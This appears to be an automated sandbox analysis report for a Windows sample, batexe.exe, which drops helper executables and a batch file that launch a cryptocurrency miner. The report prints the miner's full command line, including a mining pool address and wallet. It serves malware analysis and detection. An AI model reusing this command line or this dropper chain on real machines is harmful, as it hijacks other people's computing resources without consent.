Analysis
-
max time kernel
291s -
max time network
302s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
23-02-2024 20:01
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 620 b2e.exe 3068 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4436-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4436 wrote to memory of 620 4436 batexe.exe 87 PID 4436 wrote to memory of 620 4436 batexe.exe 87 PID 4436 wrote to memory of 620 4436 batexe.exe 87 PID 620 wrote to memory of 6092 620 b2e.exe 88 PID 620 wrote to memory of 6092 620 b2e.exe 88 PID 620 wrote to memory of 6092 620 b2e.exe 88 PID 6092 wrote to memory of 3068 6092 cmd.exe 91 PID 6092 wrote to memory of 3068 6092 cmd.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\9DB7.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9DB7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9DB7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A7F8.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:6092 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3068
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14.0MB
MD56acefdb12e2bcdafb3b9b58994a32aba
SHA169b981ad43bdc8557a6d71def251b1b2aa30dad0
SHA25664f803f9fa1bf98eca99977907a3b3b5ceaf1c04b4b47019ee75f420baabf780
SHA512b52ad14e22d7d0b93f35831195dc40f715cb87f62b785011516fd82d4006f77ee6ff6b692618a9efdb668c1c8c7e6d5809a7a3a91d12f39cbe728b921671229d
-
Filesize
2.8MB
MD51cd1f1463362e82070bd38c1ad8de2d3
SHA102b59eedcca64d1bcdbebabb05228cd292c1fdde
SHA25680c54200113264848b0a02dfef414bee7e1000ae8db116136fad1a6474d43e29
SHA512f67290611bf4653411f513f696f93add280763b3da208f3ad6a5c2b171fde413daf0d6e4909a13d93a08eed4946e98332ba40d07e39ba686cf356da9d87c355f
-
Filesize
2.6MB
MD5f845d6b8c0beb43591f7ebc96344f81b
SHA15bcb9d96f6589b559060e11d6d5a0bf73d91c80e
SHA256841b8431f27f5e631d37c605530e6ce5430559c96fa9a6ddebc7e9dd63ad04b2
SHA5128de293211ad14117c9ecb797c78c738c91b691f3dc861401d537cc72c9ba05a40340c452938bd6d72bf400efa1fffb7bb387f204035697b8a229a29288d5d357
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.2MB
MD595aa2d828d34d86f93c1b9d19a7cf0ad
SHA11c6654cb778f60be8ef7d4586b54f2b8df7600b3
SHA2568783f412bb5b47ffa40a1800b0f0dc9b30064013abe3f628ce0719af2430dc0a
SHA5127c5f8f2e6334b254f766c07576e77322f40b5fdf5068aae0abc167c7be6660d78bc8a093c4cf5499292686ef93a71d1f73bf267ded96b24ed9ecc353c7f4738b
-
Filesize
128KB
MD587bb74a6790018700645a8310bb9a32a
SHA1b0e3e91efa12e0df5ed4538d3b549ab5d9f6c16b
SHA256ee6a846f1dcf082d5216bf314e65e1428af13ce54dfaaeb371d1c54f330c5298
SHA512702e12a0858a1dd987d6a761f0ddc88fee9bce38be3d71f8c9be3fecc8cc6e88763967140f83caf4f2e10109ab95b811bb70bc70ff0b5cce8f0f32713ad3683b
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
3.1MB
MD5fa6bf44a6b32ff3c7a8b5b38a672ebd1
SHA1c7b47dd5aea1dd9a807140daa88db29065cba784
SHA2562adffd78e00ab5cb8c8a5c55c7e234adb29437d4cfb4c8e3745f02b61f45ea5e
SHA51259e91be8e3b68daad169a70b0c4f4daf0e9b62f5d1d8981443c5a25595aa24da00747b3a3e10abb150c114911b6a30ebd3b1782803b541895f9ca083cbdef2c7
-
Filesize
2.4MB
MD5b07ccc31ece2cc5fef71319ce1732eb8
SHA19a2d68cad177473a3175870fc358cdb4f6595afb
SHA2567bbe299f78dc1a8a04dea9d6607fa8e6255bed4e7574f189942ea9d5d402ba30
SHA512510680e9b34b48c14ee32939d20f47c62b2f24238e66c944930d0b9076bd14142b72727f9514970e31a48035eef80ccd80de6410564e7183e8de11b5399cc13c
-
Filesize
2.2MB
MD55cb25295334cb63e6b4d195522898229
SHA18fc99be1a298e52a48c09274aab7ea913058135e
SHA256c0c6b1386533fe75d9d5bcaec3c99a788d4ad4e4f6e12650bba07581a94497a7
SHA512fa957785980889ae7417bfd529197175049fd34d16706bc666e923ea1e7b04743e3c1f9f624f3458b5a5228c31267120453fc4e9729ec16ba9fc8973ed55d6ac
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770